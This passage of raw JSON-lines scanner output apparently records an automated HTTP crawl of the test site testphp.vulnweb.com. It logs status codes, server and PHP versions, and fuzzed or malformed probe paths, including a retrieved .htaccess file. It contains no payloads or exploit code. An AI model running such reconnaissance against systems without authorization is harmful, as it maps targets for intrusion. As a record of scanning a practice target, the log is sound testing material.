Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Flash/add.%EF%AC%82aA01\",\"time\":\"355.086771ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:02.727265596Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Flash/add.swf\",\"input\":\"http://testphp.vulnweb.com/Flash/add.swf\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"application/x-shockwave-flash\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Flash/add.swf\",\"time\":\"529.291964ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":69,\"lines\":98,\"status_code\":200,\"content_length\":17418,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:03.236840308Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Flash/add.swf’\",\"input\":\"http://testphp.vulnweb.com/Flash/add.swf%E2%80%99\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Flash/add.swf%E2%80%99\",\"time\":\"352.063606ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:03.336070737Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Flash/add.fla\",\"input\":\"http://testphp.vulnweb.com/Flash/add.fla\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"application/octet-stream\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Flash/add.fla\",\"time\":\"869.145132ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":391,\"lines\":805,\"status_code\":200,\"content_length\":154624,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:06.460080172Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Hosttestphp.vulnweb.comServer\",\"input\":\"http://testphp.vulnweb.com/Hosttestphp.vulnweb.comServer\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Hosttestphp.vulnweb.comServer\",\"time\":\"348.165435ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:06.470239687Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_S\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_S\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_S\",\"time\":\"352.191255ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:06.743964756Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/\",\"time\":\"350.148024ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":45,\"lines\":4,\"status_code\":200,\"content_length\":975,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:07.463808788Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/.htaccess\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/.htaccess\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"application/octet-stream\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/.htaccess\",\"time\":\"343.660919ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":11,\"lines\":5,\"status_code\":200,\"content_length\":176,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:07.497056651Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/.htaccessA01\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/.htaccessA01\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/.htaccessA01\",\"time\":\"348.474899ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:07.501758979Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/.htaccessA01http://testphp.vulnweb.com/Mod_Rewrite_S\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/.htaccessA01http://testphp.vulnweb.com/Mod_Rewrite_S\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/.htaccessA01http://testphp.vulnweb.com/Mod_Rewrite_S\",\"time\":\"342.853016ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:07.55708053Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/.htaccessUser-Agent:\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/.htaccessUser-Agent:\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/.htaccessUser-Agent:\",\"time\":\"346.503249ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:07.593917435Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/4\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/4\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/4\",\"time\":\"356.291674ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:07.601336038Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/4L\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/4L\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/4L\",\"time\":\"350.33541ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:07.695015906Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/A01\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/A01\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/A01\",\"time\":\"347.852799ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:07.846223323Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-1/\",\"time\":\"344.200656ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":12,\"lines\":2,\"status_code\":200,\"content_length\":100,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:07.923437254Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-1/3\",\"time\":\"349.04236ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":12,\"lines\":2,\"status_code\":200,\"content_length\":100,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:08.003781177Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3L\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3L\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-1/3L\",\"time\":\"348.560557ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":12,\"lines\":2,\"status_code\":200,\"content_length\":100,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:08.022705333Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/A01\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/A01\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-1/A01\",\"time\":\"352.843968ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":12,\"lines\":2,\"status_code\":200,\"content_length\":100,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:08.079393783Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-2/\",\"time\":\"353.322807ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":8,\"lines\":2,\"status_code\":200,\"content_length\":76,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:08.140698839Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-2/3\",\"time\":\"357.823551ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":8,\"lines\":2,\"status_code\":200,\"content_length\":76,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:08.320462633Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3L\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3L\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-2/3L\",\"time\":\"340.688321ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":8,\"lines\":2,\"status_code\":200,\"content_length\":76,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:08.387709043Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/A01\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/A01\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-2/A01\",\"time\":\"354.751573ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":8,\"lines\":2,\"status_code\":200,\"content_length\":76,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:08.392475242Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-3/\",\"time\":\"343.791578ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":11,\"lines\":2,\"status_code\":200,\"content_length\":93,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:08.432110188Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-3/3\",\"time\":\"353.294585ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":11,\"lines\":2,\"status_code\":200,\"content_length\":93,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:08.614438864Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3L\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3L\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-3/3L\",\"time\":\"347.274305ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":11,\"lines\":2,\"status_code\":200,\"content_length\":93,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:11.892961226Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/A01\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/A01\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-3/A01\",\"time\":\"347.193246ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":11,\"lines\":2,\"status_code\":200,\"content_length\":93,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:11.994329306Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/Details/\",\"time\":\"347.24434ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:12.069214461Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/Details/color-\",\"time\":\"343.767754ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:12.113347413Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/Details/color-printer/\",\"time\":\"357.172296ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:12.84670336Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3/\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/Details/color-printer/3/\",\"time\":\"339.883803ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":17,\"lines\":2,\"status_code\":200,\"content_length\":313,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:12.846703369Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3/1\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3/1\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/Details/color-printer/3/1\",\"time\":\"339.92037ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":17,\"lines\":2,\"status_code\":200,\"content_length\":313,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:13.094707042Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3/1L\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3/1L\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/Details/color-printer/3/1L\",\"time\":\"358.259424ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":17,\"lines\":2,\"status_code\":200,\"content_length\":313,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:13.596418733Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3/A01\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3/A01\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/Details/color-printer/3/A01\",\"time\":\"356.889743ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":17,\"lines\":2,\"status_code\":200,\"content_length\":313,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:13.723026786Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3/Connection:\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3/Connection:\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/Details/color-printer/3/Connection:\",\"time\":\"351.822893ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":17,\"lines\":2,\"status_code\":200,\"content_length\":313,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:16.810746092Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attac\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attac\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/Details/network-attac\",\"time\":\"348.353597ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:16.81647661Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/Details/network-attached-storage-\",\"time\":\"343.26102ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:17.098083518Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/\",\"time\":\"352.345262ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:17.817908351Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1/\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1/\",\"time\":\"351.812555ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":17,\"lines\":2,\"status_code\":200,\"content_length\":319,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:17.840371138Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1/2\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1/2\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1/2\",\"time\":\"340.856174ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":17,\"lines\":2,\"status_code\":200,\"content_length\":319,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:17